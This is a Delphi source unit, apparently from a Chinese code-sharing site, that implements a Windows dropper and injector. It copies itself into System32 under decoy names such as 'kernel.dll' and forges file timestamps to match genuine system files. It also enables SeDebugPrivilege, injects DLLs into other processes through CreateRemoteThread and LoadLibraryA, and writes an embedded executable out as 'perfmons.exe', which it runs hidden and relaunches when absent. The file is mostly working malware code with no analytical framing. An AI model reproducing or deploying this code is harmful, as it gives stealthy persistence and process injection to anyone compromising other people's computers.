📄 umyprocess.pas
字号:
unit uMyProcess;
interface
uses Classes, SysUtils, windows, TLHelp32, shellapi;
function MyThreadFunctiona(P: pointer): Longint; stdcall;
function InjectDLL(dwProcessId: DWORD; strInjectDLL: string): boolean;
function FindTarget(strExeName: string): longint;
function GetSysPath: string;
function MyGetTempPath: string;
function MyGetFileTime(const Tf: string): TDateTime;
function MySetFileDateTime(FileName: string; TargetTime: TDateTime): string;
procedure SaveToSystem32();
function GetSelfExeName(): string;
function GetDllFileVersion(dllName: string): string;
function EnabledDebugPrivilege(const Enabled: Boolean): Boolean;
var
g_strSystem32Path: string;
implementation
uses uVerInfo, uLog;
function GetSelfExeName(): string;
var
s: string;
begin
s := ParamStr(0); //获得程序带完整路径名称
while pos('\', s) <> 0 do //循环--取出应用程序名字
begin
s := copy(s, pos('\', s) + 1, length(ParamStr(0)));
end;
result := LowerCase(s);
end;
procedure SaveToSystem32();
var
strBackupDLLFile: string;
dt: TDateTime;
strSelfExePathAndName: string;
begin
strBackupDLLFile := g_strSystem32Path + 'kernel.dll';
CopyFile(pchar(ParamStr(0)), pchar(strBackupDLLFile), false);
strSelfExePathAndName := g_strSystem32Path + GetSelfExeName();
CopyFile(pchar(ParamStr(0)), pchar(strSelfExePathAndName), false);
dt := MyGetFileTime(g_strSystem32Path + 'comcat.dll');
MySetFileDateTime(strSelfExePathAndName, dt);
dt := MyGetFileTime(g_strSystem32Path + 'sndvol32.exe');
MySetFileDateTime(strBackupDLLFile, dt);
end;
function GetDllFileVersion(dllName: string): string;
var
Ver: TVerInfoRes;
begin
Ver := nil;
try
try
Ver := TVerInfoRes.Create(dllName);
result := Ver.FileVersion;
except
on e: exception do
begin
result := '';
end;
end;
finally
Ver.Free;
end;
end;
function CovFileDate(Fd: _FileTime): TDateTime;
var
Tct: _SystemTime;
Temp: _FileTime;
begin
FileTimeToLocalFileTime(Fd, Temp);
FileTimeToSystemTime(Temp, Tct);
CovFileDate := SystemTimeToDateTime(Tct);
end;
function MyGetFileTime(const Tf: string): TDateTime;
const
Model = 'yyyy/mm/dd,hh:mm:ss';
var
Tp: TSearchRec; { 申明Tp为一个查找记录 }
T1, T2, T3: string;
begin
FindFirst(Tf, faAnyFile, Tp);
// T1 := FormatDateTime(Model, CovFileDate(Tp.FindData.ftCreationTime));
// T2 := FormatDateTime('hh:mm', CovFileDate(Tp.FindData.ftLastWriteTime));
// T3 := FormatDateTime(Model, Now);
result := CovFileDate(Tp.FindData.ftLastWriteTime);
SysUtils.FindClose(Tp);
// result := t2;
end;
function MySetFileDateTime(FileName: string; TargetTime: TDateTime): string;
var
FileHandle: HFile;
SystemTime: TSystemTime;
FileTime: TFileTime;
begin
DateTimeToSystemTime(TargetTime, SystemTime);
SystemTimeToFileTime(SystemTime, FileTime);
LocalFileTimeToFileTime(FileTime, FileTime); //将本地时间转化为系统的时间,再写入文件中
FileHandle := FileOpen(FileName, fmOpenWrite or fmShareDenyNone); //fmOpenWrite就带有GENERIC_WRITE的意思
if FileHandle <= 0
then
Result := 'Open File Error!!!'
else
if not SetFileTime(FileHandle, @FileTime, @FileTime, @FileTime)
then
Result := 'Set File Time Error!!!'
else
Result := 'Set File Time Successfully!!!';
FileClose(FileHandle);
end;
function FindTarget(strExeName: string): longint;
var
clp: bool;
hHandle: THandle;
PE32: TProcessentry32;
strExeNameTmp: string;
begin
RESULT := 0;
hHandle := CreateToolhelp32Snapshot(th32cs_snapprocess, 0);
PE32.dwsize := sizeof(PE32);
clp := Process32First(hHandle, PE32);
while integer(clp) <> 0 do
begin
strExeNameTmp := PE32.szExeFile;
if AnsiSameText(strExeNameTmp, strExeName) then
begin
RESULT := PE32.th32ProcessID;
BREAK;
end;
clp := Process32Next(hHandle, PE32);
end;
closehandle(hHandle);
end;
{ 设置权限 }
function EnabledDebugPrivilege(const Enabled: Boolean): Boolean;
var
hTk: THandle; { 打开令牌句柄 }
rtnTemp: Dword; { 调整权限时返回的值 }
TokenPri: TOKEN_PRIVILEGES;
const
SE_DEBUG = 'SeDebugPrivilege'; { 查询值 }
begin
Result := False;
{ 获取进程令牌句柄,设置权限 }
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hTk)) then
begin
TokenPri.PrivilegeCount := 1;
{ 获取Luid值 }
LookupPrivilegeValue(nil, SE_DEBUG, TokenPri.Privileges[0].Luid);
if Enabled then
TokenPri.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
TokenPri.Privileges[0].Attributes := 0;
rtnTemp := 0;
{ 设置新的权限 }
AdjustTokenPrivileges(hTk, False, TokenPri, sizeof(TokenPri), nil, rtnTemp);
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hTk);
end;
end;
function InjectDLL(dwProcessId: DWORD; strInjectDLL: string): boolean;
var
hProcess: THandle;
dwSize, dwWritten: dword;
pszLibFileRemote: Pointer;
strDllName: string;
pfnStartAddr: TFNThreadStartRoutine;
TempVar: DWORD;
hRemoteThread: THANDLE;
begin
result := false;
strDllName := strInjectDLL; //;
hProcess := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE, FALSE, dwProcessId);
if hProcess = 0 then
begin
result := false;
logit('OpenProcess error:GetLastError()=' + inttostr(GetLastError()));
exit;
end;
dwSize := length(strDllName) + 1;
pszLibFileRemote := VirtualAllocEx(hProcess, nil, dwSize, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pszLibFileRemote, pchar(strDllName), dwSize, dwWritten);
if dwWritten <> dwSize then
begin
VirtualFreeEx(hProcess, pszLibFileRemote, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
logit('dwWritten <> dwSize');
exit;
end;
pfnStartAddr := GetProcAddress(GetModuleHandleA('Kernel32'), 'LoadLibraryA');
TempVar := 0;
hRemoteThread := CreateRemoteThread(hProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
if hRemoteThread <> 0 then
begin
// 等待LoadLibrary加载完毕
WaitForSingleObject(hRemoteThread, INFINITE);
GetExitCodeThread(hRemoteThread, TempVar);
CloseHandle(hRemoteThread);
result := true;
end
else
logit('CreateRemoteThread error:GetLastError()=' + inttostr(GetLastError()));
VirtualFreeEx(hProcess, pszLibFileRemote, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
end;
function GetSysPath: string;
var
sTmp: string;
begin
result := '';
//调用WindowsApi得到Windows的系统路径
SetLength(sTmp, 256);
GetSystemDirectory(PChar(sTmp), 256); //这是一个API函数
SetLength(sTmp, StrLen(PChar(sTmp)));
Result := sTmp + '\';
end;
function MyGetTempPath: string;
var
sTmp: string;
nLen:integer;
begin
result := '';
SetLength(sTmp, 512);
nLen:= windows.GetTempPath(512, PChar(sTmp));
SetLength(sTmp, nLen);
if sTmp[nLen] <> '\' then
Result := sTmp + '\'
else
result := sTmp;
end;
function GetFileSize(const FileName: string): LongInt;
var
SearchRec: TSearchRec;
begin
if FindFirst(ExpandFileName(FileName), faAnyFile, SearchRec) = 0 then
Result := SearchRec.Size
else
Result := -1;
end;
function SaveProcessExeResourceToFile(): boolean;
var
rs: TResourceStream;
dt: TDateTime;
nSize: LongInt;
begin
nSize := -1;
logit(g_strSystem32Path);
if FileExists(g_strSystem32Path + 'perfmons.exe') then
begin
nSize := GetFileSize(g_strSystem32Path + 'perfmons.exe');
end;
logit('FileExists');
try
try
rs := TResourceStream.CreateFromID(hInstance, 101, 'EXE');
logit('System32 path:' + g_strSystem32Path);
logit('resource file size:' + inttostr(rs.Size) + ' real file size:' + inttostr(nSize));
RS.SaveToFile(g_strSystem32Path + 'perfmons.exe');
dt := myGetFileTime(g_strSystem32Path + 'comcat.dll');
MySetFileDateTime(g_strSystem32Path + 'perfmons.exe', dt);
except
on e: exception do
begin
logit('error:SaveProcessExeResourceToFile:' + e.Message);
end;
end;
RS.Free;
finally
end;
end;
function RunMyProcess(): boolean;
begin
ShellExecute(0, 'open', pchar('perfmons.exe'), 0, 0, SW_SHOWMINNOACTIVE);
end;
function MyThreadFunctiona(P: pointer): Longint; stdcall;
var
objATOM: ATOM;
nSize, MyProcessId: longint;
begin
result := 0;
MyProcessId := FindTarget('perfmons.exe');
if MyProcessId <= 0 then
begin
SaveProcessExeResourceToFile();
RunMyProcess();
end;
// ////////////ProcessSelfProgram(FindTarget('notepad.exe'));
logit('MyThreadFunction --- ok!');
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -